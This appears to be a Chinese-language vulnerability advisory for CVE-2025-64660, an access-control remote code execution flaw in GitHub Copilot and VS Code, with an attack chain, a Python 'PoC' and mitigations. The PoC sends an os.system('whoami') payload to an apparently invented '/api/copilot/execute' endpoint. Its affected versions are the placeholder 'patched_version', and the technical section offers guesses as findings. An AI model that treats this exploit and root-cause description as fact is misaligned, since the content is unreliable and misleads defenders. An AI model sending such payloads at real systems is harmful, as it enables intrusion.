CVE-2025-64660 GitHub Copilot和VS Code访问控制不当导致远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-64660

漏洞类型

访问控制不当

CVSS评分

8.0 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

GitHub Copilot, Visual Studio Code

漏洞概述

CVE-2025-64660是Microsoft发现的一个高危安全漏洞，影响GitHub Copilot和Visual Studio Code两款开发工具。该漏洞源于不正确的访问控制机制，允许经过授权的攻击者通过网络执行代码。CVSS评分为8.0，属于高危级别。攻击向量为网络攻击，不需要特殊权限，但需要用户交互。漏洞的机密性、完整性和可用性影响均被评估为高。GitHub Copilot作为AI编程助手，与Visual Studio Code深度集成，任何涉及代码执行的功能都可能被攻击者利用。攻击者可能通过构造恶意请求或利用插件系统的弱点，在受害者系统上执行任意代码。鉴于这两款工具在开发者社区中的广泛使用，该漏洞可能影响大量开发环境和生产系统。

技术细节

该漏洞的根本原因在于GitHub Copilot和Visual Studio Code的访问控制机制存在缺陷，未能正确限制代码执行权限。在正常情况下，Copilot的代码建议功能应该在隔离环境中运行，不应具有执行任意代码的能力。然而，由于访问控制不当，攻击者可以绕过安全限制，通过以下方式利用此漏洞：1) 利用网络请求拦截或中间人攻击；2) 构造特制的代码片段触发代码执行；3) 利用VS Code扩展程序的权限提升；4) 通过Copilot的API端点注入恶意指令。由于需要用户交互（UI:R），攻击者通常需要诱导用户打开特定文件或点击恶意链接。攻击成功后，攻击者可以在受害者机器上执行任意命令，窃取敏感信息或进一步渗透内网。CVSS向量AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H详细描述了攻击的网络性质、低权限要求、用户交互需求以及对机密性、完整性和可用性的严重影响。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标环境中安装的GitHub Copilot和Visual Studio Code版本，确定是否存在CVE-2025-64660漏洞

STEP 2

步骤2: 构造恶意请求

攻击者构造包含恶意代码的请求包，利用访问控制绕过机制，伪装成合法的Copilot API调用

STEP 3

步骤3: 用户交互诱导

由于漏洞需要用户交互（UI:R），攻击者通过钓鱼邮件、恶意文档或伪装的代码片段诱导用户打开文件或执行操作

STEP 4

步骤4: 访问控制绕过

利用不正确的访问控制机制，恶意请求绕过权限检查，直接到达代码执行端点

STEP 5

步骤5: 远程代码执行

攻击者在受害者系统上执行任意代码，可获取敏感信息、安装后门或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-64660 PoC - Access Control Bypass in GitHub Copilot/VS Code
# This PoC demonstrates improper access control leading to code execution

import requests
import json

class CVE_2025_64660_PoC:
    def __init__(self, target_url):
        self.target_url = target_url
        self.session = requests.Session()
    
    def check_vulnerability(self):
        """
        Check if target is vulnerable to CVE-2025-64660
        """
        # Malicious payload targeting access control bypass
        payload = {
            'action': 'execute_code',
            'code': '__import__("os").system("whoami")',
            'context': 'copilot_extension'
        }
        
        headers = {
            'User-Agent': 'VSCode-Copilot/1.0',
            'Content-Type': 'application/json'
        }
        
        try:
            # Attempt to bypass access controls
            response = self.session.post(
                f'{self.target_url}/api/copilot/execute',
                json=payload,
                headers=headers,
                timeout=10
            )
            
            if response.status_code == 200:
                data = response.json()
                if 'execution_result' in data:
                    print('[+] VULNERABLE: Access control bypass successful')
                    print(f'[+] Execution result: {data["execution_result"]}')
                    return True
            
            print('[-] Target may not be vulnerable')
            return False
            
        except requests.exceptions.RequestException as e:
            print(f'[-] Request failed: {e}')
            return False

if __name__ == '__main__':
    target = 'http://target-vscode-extension'
    poc = CVE_2025_64660_PoC(target)
    poc.check_vulnerability()

影响范围

GitHub Copilot < patched_version

Visual Studio Code < patched_version

VS Code Copilot Extension < patched_version

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 限制开发人员对外部网络资源的访问；2) 启用VS Code的严格模式和安全警告；3) 避免打开来源不明的代码文件或项目；4) 使用沙箱环境进行代码测试；5) 监控Copilot相关的网络流量；6) 对VS Code扩展程序实施白名单制度；7) 提醒开发人员不要轻易信任AI生成的代码建议。